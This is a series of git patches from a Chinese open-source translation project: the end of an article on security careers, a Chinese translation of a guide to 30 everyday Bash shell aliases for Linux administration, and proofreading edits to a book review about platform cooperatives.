-事实上,如果你有兴趣领先于商业领导者,那么安全是要关注的领域 - 作为一名安全专业人员,你必须端到端地了解业务,你必须看大局来给你的公司优势。
-
-### 无所畏惧
-
-分析师和安全工作并不完全相同。公司出于必要继续合并工程和安全工作。企业正在以前所未有的速度进行基础架构和代码的自动化部署,从而提高了安全作为所有技术专业人士日常生活的一部分的重要性。在我们的[ Linux 基金会的开源工作报告][7]中,42% 的招聘经理表示未来对有安全经验的专业人士的需求很大。
-
-在安全方面从未有过更激动人心的时刻。如果你随时掌握最新的技术新闻,就会发现大量的事情与安全相关 - 数据泄露、系统故障和欺诈。安全团队正在不断变化,快节奏的环境中工作。真正的挑战在于在保持甚至改进最终用户体验的同时,积极主动地进行安全性,发现和消除漏洞。
-
-### 增长即将来临
-
-在技术的任何方面,安全将继续与云一起成长。企业越来越多地转向云计算,这暴露出比组织过去更多的安全漏洞。随着云的成熟,安全变得越来越重要。
-
-条例也在不断完善 - 个人身份信息(PII)越来越广泛。许多公司都发现他们必须投资安全来保持合规,避免成为头条新闻。由于面临巨额罚款,声誉受损以及行政工作安全,公司开始越来越多地为安全工具和人员安排越来越多的预算。
-
-### 培训和支持
-
-即使你不选择一个特定的安全工作,你也一定会发现自己需要写安全的代码,如果你没有这个技能,你将开始一场艰苦的战斗。如果你的公司提供在工作中学习的话也是鼓励的,但我建议结合培训、指导和不断实践。如果你不使用安全技能,你将很快在快速进化的恶意攻击的复杂性中失去它们。
-
-对于那些寻找安全工作的人来说,我的建议是找到组织中那些在工程、开发或者架构领域最为强大的人员 - 与他们和其他团队进行交流,做好实际工作,并且确保在心里保持大局。成为你的组织中一个脱颖而出的人,一个可以写安全的代码,同时也可以考虑战略和整体基础设施健康状况的人。
-
-### 游戏最后
-
-越来越多的公司正在投资安全性,并试图填补他们的技术团队的开放角色。如果你对管理感兴趣,那么安全是值得关注的地方。执行领导希望知道他们的公司正在按规则行事,他们的数据是安全的,并且免受破坏和损失。
-
-明治地实施和有战略思想的安全是受到关注的。安全对高管和消费者之类至关重要 - 我鼓励任何对安全感兴趣的人进行培训和贡献。
-
- _现在[下载][2]完整的 2017 年开源工作报告_
-
---------------------------------------------------------------------------------
-
-via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed
-
-作者:[ BEN COLLEN][a]
-译者:[geekpi](https://github.com/geekpi)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linux.com/users/bencollen
-[1]:https://www.linux.com/licenses/category/used-permission
-[2]:http://bit.ly/2017OSSjobsreport
-[3]:https://www.linux.com/files/images/security-skillspng
-[4]:http://www.dice.com/
-[5]:http://cyberseek.org/index.html#about
-[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163
-[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/
From c6a426a6b456afebfdad3d4118e738c51aed3a6b Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 22:36:47 +0800
Subject: [PATCH 181/371] translate done: 20120611 30 Handy Bash Shell Aliases
For Linux - Unix - Mac OS X.md
---
...ell Aliases For Linux - Unix - Mac OS X.md | 227 +++++++++---------
1 file changed, 112 insertions(+), 115 deletions(-)
rename {sources => translated}/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md (55%)
diff --git a/sources/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md b/translated/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
similarity index 55%
rename from sources/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
rename to translated/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
index 4b37c62558..d637c92858 100644
--- a/sources/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
+++ b/translated/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
@@ -1,20 +1,22 @@
-translating by lujun9972
-30 Handy Bash Shell Aliases For Linux / Unix / Mac OS X
+Linux / Unix / Mac OS X 中的 30 个方便的 Bash shell 别名
======
-An bash alias is nothing but the shortcut to commands. The alias command allows the user to launch any command or group of commands (including options and filenames) by entering a single word. Use alias command to display a list of all defined aliases. You can add user-defined aliases to [~/.bashrc][1] file. You can cut down typing time with these aliases, work smartly, and increase productivity at the command prompt.
+bash 别名不是别的,只不过是指向命令的快捷方式而已。`alias` 命令允许用户只输入一个单词就运行任意一个命令或一组命令(包括命令选项和文件名)。执行 `alias` 命令会显示一个所有已定义别名的列表。你可以在 [~/.bashrc][1] 文件中自定义别名。使用别名可以在命令行中减少输入的时间,使工作更流畅,同时提高生产率。
-This post shows how to create and use aliases including 30 practical examples of bash shell aliases.
-[![30 Useful Bash Shell Aliase For Linux/Unix Users][2]][2]
+本文通过 30 个 bash shell 别名的实际案例演示了如何创建和使用别名。
-## More about bash alias
+![30 Useful Bash Shell Aliase For Linux/Unix Users][2]
-The general syntax for the alias command for the bash shell is as follows:
+## bash alias 的那些事
-### How to list bash aliases
+bash shell 中的 alias 命令的语法是这样的:
-Type the following [alias command][3]:
-`alias`
-Sample outputs:
+### 如何列出 bash 别名
+
+输入下面的 [alias 命令 ][3]:
+```
+alias
+```
+结果为:
```
alias ..='cd ..'
alias amazonbackup='s3backup'
@@ -23,11 +25,11 @@ alias apt-get='sudo apt-get'
```
-By default alias command shows a list of aliases that are defined for the current user.
+默认 alias 命令会列出当前用户定义好的别名。
-### How to define or create a bash shell alias
+### 如何定义或者说创建一个 bash shell 别名
-To [create the alias][4] use the following syntax:
+使用下面语法 [创建别名 ][4]:
```
alias name =value
alias name = 'command'
@@ -36,22 +38,19 @@ alias name = '/path/to/script'
alias name = '/path/to/script.pl arg1'
```
-alias name=value alias name='command' alias name='command arg1 arg2' alias name='/path/to/script' alias name='/path/to/script.pl arg1'
-
-In this example, create the alias **c** for the commonly used clear command, which clears the screen, by typing the following command and then pressing the ENTER key:
+举个例子,输入下面命令并回车就会为常用的 `clear`( 清除屏幕)命令创建一个别名 **c**:
```
alias c = 'clear'
```
-
-Then, to clear the screen, instead of typing clear, you would only have to type the letter 'c' and press the [ENTER] key:
+然后输入字母 `c` 而不是 `clear` 后回车就会清除屏幕了:
```
c
```
-### How to disable a bash alias temporarily
+### 如何临时性地禁用 bash 别名
-An [alias can be disabled temporarily][5] using the following syntax:
+下面语法可以[临时性地禁用别名 ][5]:
```
## path/to/full/command
/usr/bin/clear
@@ -61,37 +60,37 @@ An [alias can be disabled temporarily][5] using the following syntax:
command ls
```
-### How to delete/remove a bash alias
+### 如何删除 bash 别名
-You need to use the command [called unalias to remove aliases][6]. Its syntax is as follows:
+使用 [unalias 命令来删除别名 ][6]。其语法为:
```
unalias aliasname
unalias foo
```
-In this example, remove the alias c which was created in an earlier example:
+例如,删除我们之前创建的别名 `c`:
```
unalias c
```
-You also need to delete the alias from the [~/.bashrc file][1] using a text editor (see next section).
+你还需要用文本编辑器删掉 [~/.bashrc 文件 ][1] 中的别名定义(参见下一部分内容)。
-The alias c remains in effect only during the current login session. Once you logs out or reboot the system the alias c will be gone. To avoid this problem, add alias to your [~/.bashrc file][1], enter:
+### 如何让 bash shell 别名永久生效
+
+别名 `c` 在当前登录会话中依然有效。但当你登出或重启系统后,别名 `c` 就没有了。为了防止出现这个问题,将别名定义写入 [~/.bashrc file][1] 中,输入:
```
vi ~/.bashrc
```
-
-
-The alias c for the current user can be made permanent by entering the following line:
+输入下行内容让别名 `c` 对当前用户永久有效:
```
alias c = 'clear'
```
-Save and close the file. System-wide aliases (i.e. aliases for all users) can be put in the /etc/bashrc file. Please note that the alias command is built into a various shells including ksh, tcsh/csh, ash, bash and others.
+保存并关闭文件就行了。系统级的别名(也就是对所有用户都生效的别名)可以放在 `/etc/bashrc` 文件中。请注意,alias 命令内建于各种 shell 中,包括 ksh、tcsh/csh、ash、bash 以及其他 shell。
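+
+下面是一个系统级别名的简单示意(仅作演示:别名的名字和内容都是假设的,修改 `/etc/bashrc` 需要 root 权限,个别发行版中系统级配置文件的位置可能不同):
+
+```
+# 以 root 身份追加一个对所有用户生效的别名(示例)
+echo "alias ll='ls -la'" | sudo tee -a /etc/bashrc
+# 新开一个登录会话,或重新加载该文件后生效
+source /etc/bashrc
+```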
-### A note about privileged access
+### 关于特权权限判断
-You can add code as follows in ~/.bashrc:
+可以将下面代码加入 `~/.bashrc`:
```
# if user is not root, pass all commands via sudo #
if [ $UID -ne 0 ]; then
@@ -100,9 +99,9 @@ if [ $UID -ne 0 ]; then
fi
```
-### A note about os specific aliases
+### 定义与操作系统类型相关的别名
-You can add code as follows in ~/.bashrc [using the case statement][7]:
+可以将下面代码加入 `~/.bashrc` [使用 case 语句 ][7]:
```
### Get os name via uname ###
_myos="$(uname)"
@@ -116,13 +115,13 @@ case $_myos in
esac
```
-## 30 bash shell aliases examples
+## 30 个 bash shell 别名的案例
-You can define various types aliases as follows to save time and increase productivity.
+你可以定义各种类型的别名来节省时间并提高生产率。
-### #1: Control ls command output
+### #1:控制 ls 命令的输出
-The [ls command lists directory contents][8] and you can colorize the output:
+[ls 命令列出目录中的内容 ][8] 而你可以对输出进行着色:
```
## Colorize the ls output ##
alias ls = 'ls --color=auto'
@@ -134,7 +133,7 @@ alias ll = 'ls -la'
alias l.= 'ls -d . .. .git .gitignore .gitmodules .travis.yml --color=auto'
```
-### #2: Control cd command behavior
+### #2:控制 cd 命令的行为
```
## get rid of command not found ##
alias cd..= 'cd ..'
@@ -148,9 +147,9 @@ alias .4= 'cd ../../../../'
alias .5= 'cd ../../../../..'
```
-### #3: Control grep command output
+### #3:控制 grep 命令的输出
-[grep command is a command-line utility for searching][9] plain-text files for lines matching a regular expression:
+[grep 命令是一个用于在纯文本文件中搜索匹配正则表达式的行的命令行工具 ][9]:
```
## Colorize the grep command output for ease of use (good for log files)##
alias grep = 'grep --color=auto'
@@ -158,44 +157,44 @@ alias egrep = 'egrep --color=auto'
alias fgrep = 'fgrep --color=auto'
```
-### #4: Start calculator with math support
+### #4:让计算器默认开启 math 库
```
alias bc = 'bc -l'
```
-### #4: Generate sha1 digest
+### #4:生成 sha1 摘要
```
alias sha1 = 'openssl sha1'
```
-### #5: Create parent directories on demand
+### #5:自动创建父目录
-[mkdir command][10] is used to create a directory:
+[mkdir 命令 ][10] 用于创建目录:
```
alias mkdir = 'mkdir -pv'
```
-### #6: Colorize diff output
+### #6:为 diff 输出着色
-You can [compare files line by line using diff][11] and use a tool called colordiff to colorize diff output:
+你可以[使用 diff 来一行行地比较文件 ][11],而一个名为 colordiff 的工具可以为 diff 输出着色:
```
# install colordiff package :)
alias diff = 'colordiff'
```
-### #7: Make mount command output pretty and human readable format
+### #7:让 mount 命令的输出更漂亮,更方便人类阅读
```
alias mount = 'mount |column -t'
```
-### #8: Command short cuts to save time
+### #8:简化命令以节省时间
```
# handy short cuts #
alias h = 'history'
alias j = 'jobs -l'
```
-### #9: Create a new set of commands
+### #9:创建一系列新命令
```
alias path = 'echo -e ${PATH//:/\\n}'
alias now = 'date +"%T"'
@@ -203,7 +202,7 @@ alias nowtime =now
alias nowdate = 'date +"%d-%m-%Y"'
```
-### #10: Set vim as default
+### #10:设置 vim 为默认编辑器
```
alias vi = vim
alias svi = 'sudo vi'
@@ -211,7 +210,7 @@ alias vis = 'vim "+set si"'
alias edit = 'vim'
```
-### #11: Control output of networking tool called ping
+### #11:控制网络工具 ping 的输出
```
# Stop after sending count ECHO_REQUEST packets #
alias ping = 'ping -c 5'
@@ -220,16 +219,16 @@ alias ping = 'ping -c 5'
alias fastping = 'ping -c 100 -s.2'
```
-### #12: Show open ports
+### #12:显示打开的端口
-Use [netstat command][12] to quickly list all TCP/UDP port on the server:
+使用 [netstat 命令 ][12] 可以快速列出服务器上所有的 TCP/UDP 端口:
```
alias ports = 'netstat -tulanp'
```
-### #13: Wakeup sleeping servers
+### #13:唤醒休眠的服务器
-[Wake-on-LAN (WOL) is an Ethernet networking][13] standard that allows a server to be turned on by a network message. You can [quickly wakeup nas devices][14] and server using the following aliases:
+[Wake-on-LAN (WOL) 是一个以太网标准 ][13],可以通过网络消息来开启服务器。你可以使用下面别名来[快速激活 nas 设备 ][14] 以及服务器:
```
## replace mac with your actual server mac address #
alias wakeupnas01 = '/usr/bin/wakeonlan 00:11:32:11:15:FC'
@@ -237,9 +236,9 @@ alias wakeupnas02 = '/usr/bin/wakeonlan 00:11:32:11:15:FD'
alias wakeupnas03 = '/usr/bin/wakeonlan 00:11:32:11:15:FE'
```
-### #14: Control firewall (iptables) output
+### #14:控制防火墙 (iptables) 的输出
-[Netfilter is a host-based firewall][15] for Linux operating systems. It is included as part of the Linux distribution and it is activated by default. This [post list most common iptables solutions][16] required by a new Linux user to secure his or her Linux operating system from intruders.
+[Netfilter 是一款 Linux 操作系统上的主机防火墙 ][15]。它是 Linux 发行版中的一部分,且默认情况下处于激活状态。[这里列出了 Linux 新手用来防范入侵者的大多数常用 iptables 方法 ][16]。
```
## shortcut for iptables and pass it via sudo#
alias ipt = 'sudo /sbin/iptables'
@@ -252,7 +251,7 @@ alias iptlistfw = 'sudo /sbin/iptables -L FORWARD -n -v --line-numbers'
alias firewall =iptlist
```
-### #15: Debug web server / cdn problems with curl
+### #15:使用 curl 调试 web 服务器 /cdn 上的问题
```
# get web server headers #
alias header = 'curl -I'
@@ -261,7 +260,7 @@ alias header = 'curl -I'
alias headerc = 'curl -I --compress'
```
-### #16: Add safety nets
+### #16:增加安全性
```
# do not delete / or prompt if deleting more than 3 files at a time #
alias rm = 'rm -I --preserve-root'
@@ -277,9 +276,9 @@ alias chmod = 'chmod --preserve-root'
alias chgrp = 'chgrp --preserve-root'
```
-### #17: Update Debian Linux server
+### #17:更新 Debian Linux 服务器
-[apt-get command][17] is used for installing packages over the internet (ftp or http). You can also upgrade all packages in a single operations:
+[apt-get 命令 ][17] 用于通过因特网安装软件包 (ftp 或 http)。你也可以一次性升级所有软件包:
```
# distro specific - Debian / Ubuntu and friends #
# install with apt-get
@@ -290,25 +289,25 @@ alias updatey = "sudo apt-get --yes"
alias update = 'sudo apt-get update && sudo apt-get upgrade'
```
-### #18: Update RHEL / CentOS / Fedora Linux server
+### #18:更新 RHEL / CentOS / Fedora Linux 服务器
-[yum command][18] is a package management tool for RHEL / CentOS / Fedora Linux and friends:
+[yum 命令 ][18] 是 RHEL / CentOS / Fedora Linux 以及其他基于这些发行版的 Linux 上的软件包管理工具:
```
## distrp specifc RHEL/CentOS ##
alias update = 'yum update'
alias updatey = 'yum -y update'
```
-### #19: Tune sudo and su
+### #19:优化 sudo 和 su 命令
```
# become root #
alias root = 'sudo -i'
alias su = 'sudo -i'
```
-### #20: Pass halt/reboot via sudo
+### #20:使用 sudo 执行 halt/reboot 命令
-[shutdown command][19] bring the Linux / Unix system down:
+[shutdown 命令 ][19] 会让 Linux / Unix 系统关机:
```
# reboot / halt / poweroff
alias reboot = 'sudo /sbin/reboot'
@@ -317,7 +316,7 @@ alias halt = 'sudo /sbin/halt'
alias shutdown = 'sudo /sbin/shutdown'
```
-### #21: Control web servers
+### #21:控制 web 服务器
```
# also pass it via sudo so whoever is admin can reload it without calling you #
alias nginxreload = 'sudo /usr/local/nginx/sbin/nginx -s reload'
@@ -328,7 +327,7 @@ alias httpdreload = 'sudo /usr/sbin/apachectl -k graceful'
alias httpdtest = 'sudo /usr/sbin/apachectl -t && /usr/sbin/apachectl -t -D DUMP_VHOSTS'
```
-### #22: Alias into our backup stuff
+### #22:与备份相关的别名
```
# if cron fails or if you want backup on demand just run these commands #
# again pass it via sudo so whoever is in admin group can start the job #
@@ -343,7 +342,7 @@ alias rsnapshotmonthly = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnaps
alias amazonbackup =s3backup
```
-### #23: Desktop specific - play avi/mp3 files on demand
+### #23:桌面应用相关的别名 - 按需播放的 avi/mp3 文件
```
## play video files in a current directory ##
# cd ~/Download/movie-name
@@ -366,9 +365,9 @@ alias music = 'mplayer --shuffle *'
```
-### #24: Set default interfaces for sys admin related commands
+### #24:设置系统管理相关命令的默认网卡
-[vnstat is console-based network][20] traffic monitor. [dnstop is console tool][21] to analyze DNS traffic. [tcptrack and iftop commands displays][22] information about TCP/UDP connections it sees on a network interface and display bandwidth usage on an interface by host respectively.
+[vnstat 是一款基于终端的网络流量监测器 ][20]。[dnstop 是一款分析 DNS 流量的终端工具 ][21]。[tcptrack 和 iftop 命令 ][22] 分别用于显示网卡上 TCP/UDP 连接的信息,以及按主机显示网卡上的带宽使用情况。
```
## All of our servers eth1 is connected to the Internets via vlan / router etc ##
alias dnstop = 'dnstop -l 5 eth1'
@@ -382,7 +381,7 @@ alias ethtool = 'ethtool eth1'
alias iwconfig = 'iwconfig wlan0'
```
-### #25: Get system memory, cpu usage, and gpu memory info quickly
+### #25:快速获取系统内存、CPU 使用和 GPU 内存相关信息
```
## pass options to free ##
alias meminfo = 'free -m -l -t'
@@ -405,9 +404,9 @@ alias cpuinfo = 'lscpu'
alias gpumeminfo = 'grep -i --color memory /var/log/Xorg.0.log'
```
-### #26: Control Home Router
+### #26:控制家用路由器
-The curl command can be used to [reboot Linksys routers][23].
+curl 命令可以用来 [重启 Linksys 路由器 ][23]。
```
# Reboot my home Linksys WAG160N / WAG54 / WAG320 / WAG120N Router / Gateway from *nix.
alias rebootlinksys = "curl -u 'admin:my-super-password' 'http://192.168.1.2/setup.cgi?todo=reboot'"
@@ -416,15 +415,15 @@ alias rebootlinksys = "curl -u 'admin:my-super-password' 'http://192.168.1.2/set
alias reboottomato = "ssh admin@192.168.1.1 /sbin/reboot"
```
-### #27 Resume wget by default
+### #27 wget 默认断点续传
-The [GNU Wget is a free utility for non-interactive download][25] of files from the Web. It supports HTTP, HTTPS, and FTP protocols, and it can resume downloads too:
+[GNU Wget 是一款用来从 web 下载文件的自由软件 ][25]。它支持 HTTP、HTTPS 以及 FTP 协议,而且它也支持断点续传:
```
## this one saved by butt so many times ##
alias wget = 'wget -c'
```
-### #28 Use different browser for testing website
+### #28 使用不同浏览器来测试网站
```
## this one saved by butt so many times ##
alias ff4 = '/opt/firefox4/firefox'
@@ -439,9 +438,9 @@ alias ff =ff13
alias browser =chrome
```
-### #29: A note about ssh alias
+### #29:关于 ssh 别名的注意事项
-Do not create ssh alias, instead use ~/.ssh/config OpenSSH SSH client configuration files. It offers more option. An example:
+不要创建 ssh 别名,代之以 `~/.ssh/config` 这个 OpenSSH SSH 客户端配置文件。它的选项更加丰富。下面是一个例子:
```
Host server10
Hostname 1.2.3.4
@@ -452,12 +451,12 @@ Host server10
TCPKeepAlive yes
```
-Host server10 Hostname 1.2.3.4 IdentityFile ~/backups/.ssh/id_dsa user foobar Port 30000 ForwardX11Trusted yes TCPKeepAlive yes
+然后你就可以使用下面语句连接 server10 了:
+```
+$ ssh server10
+```
-You can now connect to peer1 using the following syntax:
-`$ ssh server10`
-
-### #30: It's your turn to share…
+### #30:现在该分享你的别名了
```
## set some other defaults ##
@@ -487,20 +486,18 @@ alias cdnmdel = '/home/scripts/admin/cdn/purge_cdn_cache --profile akamai --stdi
alias amzcdnmdel = '/home/scripts/admin/cdn/purge_cdn_cache --profile amazon --stdin'
```
-## Conclusion
+## 结论
-This post summarizes several types of uses for *nix bash aliases:
+本文总结了 *nix bash 别名的多种用法:
- 1. Setting default options for a command (e.g. set eth0 as default option for ethtool command via alias ethtool='ethtool eth0' ).
- 2. Correcting typos (cd.. will act as cd .. via alias cd..='cd ..').
- 3. Reducing the amount of typing.
- 4. Setting the default path of a command that exists in several versions on a system (e.g. GNU/grep is located at /usr/local/bin/grep and Unix grep is located at /bin/grep. To use GNU grep use alias grep='/usr/local/bin/grep' ).
- 5. Adding the safety nets to Unix by making commands interactive by setting default options. (e.g. rm, mv, and other commands).
- 6. Compatibility by creating commands for older operating systems such as MS-DOS or other Unix like operating systems (e.g. alias del=rm ).
+ 1. 为命令设置默认的参数(例如通过 `alias ethtool='ethtool eth0'` 设置 ethtool 命令的默认参数为 eth0)。
+ 2. 修正错误的拼写(通过 `alias cd..='cd ..'` 让 `cd..` 变成 `cd ..`)。
+ 3. 缩减输入。
+ 4. 设置系统中多版本命令的默认路径(例如 GNU/grep 位于 /usr/local/bin/grep 中而 Unix grep 位于 /bin/grep 中。若想默认使用 GNU grep 则设置别名 `grep='/usr/local/bin/grep'` )。
+ 5. 通过默认开启命令(例如 rm、mv 等命令)的交互参数来增加 Unix 的安全性。
+ 6. 为老旧的操作系统(比如 MS-DOS 或者其他类似 Unix 的操作系统)创建命令以增加兼容性(比如 `alias del=rm` )。
-
-
-I've shared my aliases that I used over the years to reduce the need for repetitive command line typing. If you know and use any other bash/ksh/csh aliases that can reduce typing, share below in the comments.
+我已经分享了我多年来用于减少重复命令输入的别名。若你知道或使用着其他能够减少输入的 bash/ksh/csh 别名,请在下面的评论中分享。
--------------------------------------------------------------------------------
@@ -516,26 +513,26 @@ via: https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html
[a]:https://www.cyberciti.biz
[1]:https://bash.cyberciti.biz/guide/~/.bashrc
[2]:https://www.cyberciti.biz/tips/wp-content/uploads/2012/06/Getting-Started-With-Bash-Shell-Aliases-For-Linux-Unix.jpg
-[3]://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html (See Linux/Unix alias command examples for more info)
+[3]:https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html (See Linux/Unix alias command examples for more info)
[4]:https://bash.cyberciti.biz/guide/Create_and_use_aliases
-[5]://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/
+[5]:https://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/
[6]:https://bash.cyberciti.biz/guide/Create_and_use_aliases#How_do_I_remove_the_alias.3F
[7]:https://bash.cyberciti.biz/guide/The_case_statement
-[8]://www.cyberciti.biz/faq/ls-command-to-examining-the-filesystem/
-[9]://www.cyberciti.biz/faq/howto-use-grep-command-in-linux-unix/
-[10]://www.cyberciti.biz/faq/linux-make-directory-command/
-[11]://www.cyberciti.biz/faq/how-do-i-compare-two-files-under-linux-or-unix/
-[12]://www.cyberciti.biz/faq/how-do-i-find-out-what-ports-are-listeningopen-on-my-linuxfreebsd-server/
-[13]://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
+[8]:https://www.cyberciti.biz/faq/ls-command-to-examining-the-filesystem/
+[9]:https://www.cyberciti.biz/faq/howto-use-grep-command-in-linux-unix/
+[10]:https://www.cyberciti.biz/faq/linux-make-directory-command/
+[11]:https://www.cyberciti.biz/faq/how-do-i-compare-two-files-under-linux-or-unix/
+[12]:https://www.cyberciti.biz/faq/how-do-i-find-out-what-ports-are-listeningopen-on-my-linuxfreebsd-server/
+[13]:https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
[14]:https://bash.cyberciti.biz/misc-shell/simple-shell-script-to-wake-up-nas-devices-computers/
-[15]://www.cyberciti.biz/faq/rhel-fedorta-linux-iptables-firewall-configuration-tutorial/ (iptables CentOS/RHEL/Fedora tutorial)
-[16]://www.cyberciti.biz/tips/linux-iptables-examples.html
-[17]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html
-[18]://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/
-[19]://www.cyberciti.biz/faq/howto-shutdown-linux/
-[20]://www.cyberciti.biz/tips/keeping-a-log-of-daily-network-traffic-for-adsl-or-dedicated-remote-linux-box.html
-[21]://www.cyberciti.biz/faq/dnstop-monitor-bind-dns-server-dns-network-traffic-from-a-shell-prompt/
-[22]://www.cyberciti.biz/faq/check-network-connection-linux/
-[23]://www.cyberciti.biz/faq/reboot-linksys-wag160n-wag54-wag320-wag120n-router-gateway/
-[24]:/cdn-cgi/l/email-protection
-[25]://www.cyberciti.biz/tips/wget-resume-broken-download.html
+[15]:https://www.cyberciti.biz/faq/rhel-fedorta-linux-iptables-firewall-configuration-tutorial/ (iptables CentOS/RHEL/Fedora tutorial)
+[16]:https://www.cyberciti.biz/tips/linux-iptables-examples.html
+[17]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html
+[18]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/
+[19]:https://www.cyberciti.biz/faq/howto-shutdown-linux/
+[20]:https://www.cyberciti.biz/tips/keeping-a-log-of-daily-network-traffic-for-adsl-or-dedicated-remote-linux-box.html
+[21]:https://www.cyberciti.biz/faq/dnstop-monitor-bind-dns-server-dns-network-traffic-from-a-shell-prompt/
+[22]:https://www.cyberciti.biz/faq/check-network-connection-linux/
+[23]:https://www.cyberciti.biz/faq/reboot-linksys-wag160n-wag54-wag320-wag120n-router-gateway/
+[24]:https://www.cyberciti.biz/cdn-cgi/l/email-protection
+[25]:https://www.cyberciti.biz/tips/wget-resume-broken-download.html
From 4c7c594d470ac79df12bbf208bd1cc5a83cdafa0 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 23:05:24 +0800
Subject: [PATCH 182/371] PRF:20170131 Book review Ours to Hack and to Own.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@darsh8 恭喜你完成了第一篇翻译贡献(很抱歉,没及时看到你的贡献,所以校对发布有点晚了)。
---
...131 Book review Ours to Hack and to Own.md | 37 ++++++++++---------
1 file changed, 19 insertions(+), 18 deletions(-)
diff --git a/translated/talk/20170131 Book review Ours to Hack and to Own.md b/translated/talk/20170131 Book review Ours to Hack and to Own.md
index 1948ea4ab9..32e5f75a66 100644
--- a/translated/talk/20170131 Book review Ours to Hack and to Own.md
+++ b/translated/talk/20170131 Book review Ours to Hack and to Own.md
@@ -1,48 +1,49 @@
书评:《Ours to Hack and to Own》
============================================================
- ![书评: Ours to Hack and to Own](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/EDUCATION_colorbooks.png?itok=liB3FyjP "Book review: Ours to Hack and to Own")
+ ![书评: Ours to Hack and to Own](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "Book review: Ours to Hack and to Own")
+
Image by : opensource.com
-私有制的时代看起来似乎结束了,我将不仅仅讨论那些由我们中的许多人引入到我们的家庭与生活的设备和软件。我也将讨论这些设备与应用依赖的平台与服务。
+私有制的时代看起来似乎结束了,在这里我将不仅仅讨论那些由我们中的许多人引入到我们的家庭与生活的设备和软件,我也将讨论这些设备与应用依赖的平台与服务。
-尽管我们使用的许多服务是免费的,我们对它们并没有任何控制。本质上讲,这些企业确实控制着我们所看到的,听到的以及阅读到的内容。不仅如此,许多企业还在改变工作的性质。他们正使用封闭的平台来助长由全职工作到[零工经济][2]的转变方式,这种方式提供极少的安全性与确定性。
+尽管我们使用的许多服务是免费的,但我们对它们并没有任何控制权。本质上讲,这些企业确实控制着我们所看到的、听到的以及阅读到的内容。不仅如此,许多企业还在改变工作的本质。他们正使用封闭的平台来助长由全职工作到[零工经济][2]的转变,这种方式提供极少的安全性与确定性。
-这项行动对于网络以及每一个使用与依赖网络的人产生了广泛的影响。仅仅二十多年前的开放网络的想象正在逐渐消逝并迅速地被一块难以穿透的幕帘所取代。
+这项行动对于网络以及每一个使用与依赖网络的人产生了广泛的影响。仅仅二十多年前的对开放互联网的想象正在逐渐消逝,并迅速地被一块难以穿透的幕帘所取代。
-一种变得流行的补救办法就是建立[平台合作][3], 由他们的用户所拥有的电子化平台。正如这本书所阐述的,平台合作社背后的观点与开源有许多相同的根源。
+一种逐渐流行的补救办法就是建立[平台合作社][3], 即由他们的用户所拥有的电子化平台。正如这本书[《Ours to Hack and to Own》][4]所阐述的,平台合作社背后的观点与开源有许多相同的根源。
-学者Trebor Scholz和作家Nathan Schneider已经收集了40篇探讨平台合作社作为普通人可使用以提升开放性并对闭源系统的不透明性及各种限制予以还击的工具的增长及需求的论文。
+学者 Trebor Scholz 和作家 Nathan Schneider 已经收集了 40 篇论文,探讨平台合作社作为普通人可使用的工具的增长及需求,以提升开放性并对闭源系统的不透明性及各种限制予以还击。
-### 哪里适合开源
+### 何处适合开源
-任何平台合作社核心及接近核心的部分依赖与开源;不仅开源技术是必要的,构成开源开放性,透明性,协同合作以及共享的准则与理念同样不可或缺。
+任何平台合作社核心及接近核心的部分依赖于开源;不仅开源技术是必要的,构成开源开放性、透明性、协同合作以及共享的准则与理念同样不可或缺。
-在这本书的介绍中, Trebor Scholz指出:
+在这本书的介绍中,Trebor Scholz 指出:
-> 与网络的黑盒子系统相反,这些平台需要使它们的数据流透明来辨别自身。他们需要展示客户与员工的数据在哪里存储,数据出售给了谁以及数据为了何种目的。
+> 与斯诺登时代的互联网黑盒子系统相反,这些平台需要使它们的数据流透明来辨别自身。他们需要展示客户与员工的数据在哪里存储,数据出售给了谁以及数据用于何种目的。
-正是对开源如此重要的透明性,促使平台合作社如此吸引人并在目前大量已存平台之中成为令人耳目一新的变化。
+正是对开源如此重要的透明性,促使平台合作社如此吸引人,并在目前大量已有平台之中成为令人耳目一新的变化。
-开源软件在《Ours to Hack and to Own》所分享的平台合作社的构想中必然充当着重要角色。开源软件能够为群体建立助推合作社的技术型公共建设提供快速,不算昂贵的途径。
+开源软件在《Ours to Hack and to Own》所分享的平台合作社的构想中必然充当着重要角色。开源软件能够为群体建立助推合作社的技术基础设施提供快速而不算昂贵的途径。
